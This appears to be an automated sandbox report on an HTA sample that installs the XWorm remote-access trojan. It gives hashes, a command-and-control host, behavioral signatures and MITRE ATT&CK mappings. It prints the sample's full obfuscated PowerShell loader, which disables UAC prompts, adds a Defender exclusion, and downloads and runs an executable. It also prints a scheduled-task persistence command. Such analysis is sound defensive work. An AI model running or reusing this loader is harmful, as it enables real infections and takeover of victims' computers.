Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-10-2024 06:11
Static task
static1
Behavioral task
behavioral1
Sample
na.hta
Resource
win7-20240708-en
General
-
Target
na.hta
-
Size
11KB
-
MD5
ea742132a205bf7b433598cb2a8fa3f5
-
SHA1
43a79f227c20901143be107f6922740acc54cf29
-
SHA256
183a5a6477a06e439c82b04421d4424f7fc69694780cae4a87278d367753598a
-
SHA512
3983d17c65890c9e5d52a2a486b97a7e3ffa3d5a9a81d25739ac33cfc0db9d68647d202d0c845183b4e6f019be398e6f3a339204e8f64e87a73327fb1d2553c4
-
SSDEEP
192:RxzslVZBh+kMufgTcPOGYhPE90KZEMx5DTmoRjtP/83anTnChFJkEFRhPSS:RWvMuYJOnTmoRtEKnTChISh6S
Malware Config
Extracted
xworm
3.1
needforrat.hopto.org:7000
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\new.exe family_xworm behavioral2/memory/1092-55-0x00000000008C0000-0x00000000008DA000-memory.dmp family_xworm -
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 21 844 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exenew.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation new.exe -
Drops startup file 2 IoCs
Processes:
new.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk new.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk new.exe -
Executes dropped EXE 3 IoCs
Processes:
new.exenew.exenew.exepid process 1092 new.exe 4328 new.exe 1992 new.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
new.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\new = "C:\\Users\\Admin\\AppData\\Roaming\\new.exe" new.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
mshta.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exenew.exepid process 844 powershell.exe 844 powershell.exe 1092 new.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exenew.exenew.exenew.exedescription pid process Token: SeDebugPrivilege 844 powershell.exe Token: SeDebugPrivilege 1092 new.exe Token: SeDebugPrivilege 1092 new.exe Token: SeDebugPrivilege 4328 new.exe Token: SeDebugPrivilege 1992 new.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
new.exepid process 1092 new.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
mshta.exepowershell.exenew.exedescription pid process target process PID 1556 wrote to memory of 844 1556 mshta.exe powershell.exe PID 1556 wrote to memory of 844 1556 mshta.exe powershell.exe PID 1556 wrote to memory of 844 1556 mshta.exe powershell.exe PID 844 wrote to memory of 1092 844 powershell.exe new.exe PID 844 wrote to memory of 1092 844 powershell.exe new.exe PID 1092 wrote to memory of 2900 1092 new.exe schtasks.exe PID 1092 wrote to memory of 2900 1092 new.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\na.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function mTxDUxaScYmr($LqgFFPWj, $lVgtUaSQwbRXQClp){[IO.File]::WriteAllBytes($LqgFFPWj, $lVgtUaSQwbRXQClp)};function zYuVqWK($LqgFFPWj){if($LqgFFPWj.EndsWith((BuXuLXiijdTMRmDi @(43804,43858,43866,43866))) -eq $True){rundll32.exe $LqgFFPWj }elseif($LqgFFPWj.EndsWith((BuXuLXiijdTMRmDi @(43804,43870,43873,43807))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $LqgFFPWj}elseif($LqgFFPWj.EndsWith((BuXuLXiijdTMRmDi @(43804,43867,43873,43863))) -eq $True){misexec /qn /i $LqgFFPWj}else{Start-Process $LqgFFPWj}};function ueJWAHPbJFrFhUAtPKf($zxfGsNthtwq){$TCvpArgzJufvl = New-Object (BuXuLXiijdTMRmDi @(43836,43859,43874,43804,43845,43859,43856,43825,43866,43863,43859,43868,43874));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$lVgtUaSQwbRXQClp = $TCvpArgzJufvl.DownloadData($zxfGsNthtwq);return $lVgtUaSQwbRXQClp};function BuXuLXiijdTMRmDi($GfcAO){$dZwGHElOYQ=43758;$IHZVeSlpJsUJNPA=$Null;foreach($kTBuzMksTQXtM in $GfcAO){$IHZVeSlpJsUJNPA+=[char]($kTBuzMksTQXtM-$dZwGHElOYQ)};return $IHZVeSlpJsUJNPA};function uqElSPqCUKRSUqTItU(){$MhGWljTYDYPGF = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$FxRqYVoPEMaIQDGEmVIr=$env:AppData; Add-MpPreference -ExclusionPath $FxRqYVoPEMaIQDGEmVIr;$dalTxgqsQiNh = $MhGWljTYDYPGF + 'new.exe'; if (Test-Path -Path $dalTxgqsQiNh){zYuVqWK $dalTxgqsQiNh;}Else{ $ztEoJaUP = ueJWAHPbJFrFhUAtPKf (BuXuLXiijdTMRmDi @(43862,43874,43874,43870,43816,43805,43805,43808,43807,43806,43804,43811,43812,43804,43807,43809,43804,43807,43807,43810,43805,43868,43859,43877,43804,43859,43878,43859));mTxDUxaScYmr $dalTxgqsQiNh $ztEoJaUP;zYuVqWK $dalTxgqsQiNh;};;;;}uqElSPqCUKRSUqTItU;" uac2⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Users\Admin\AppData\Roaming\new.exe"C:\Users\Admin\AppData\Roaming\new.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "new" /tr "C:\Users\Admin\AppData\Roaming\new.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2900
-
-
-
-
C:\Users\Admin\AppData\Roaming\new.exeC:\Users\Admin\AppData\Roaming\new.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
C:\Users\Admin\AppData\Roaming\new.exeC:\Users\Admin\AppData\Roaming\new.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1992
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
75KB
MD54c2a997fa2661fbfe14db1233b16364c
SHA1e48025dbd61de286e13b25b144bf4da5da62761a
SHA256c2a299f988158d07a573a21621b00b1577b7c232f91c1442ba30d272e4414c5d
SHA512529a26f4769c7be0986e16d8e0bf37632b7b723a3e8d9fa8bb3f9cc4d766bd4d24a802d6aa43fe4df85c23cd680b0188c7e1eaff443a30203b298ba916aa0a57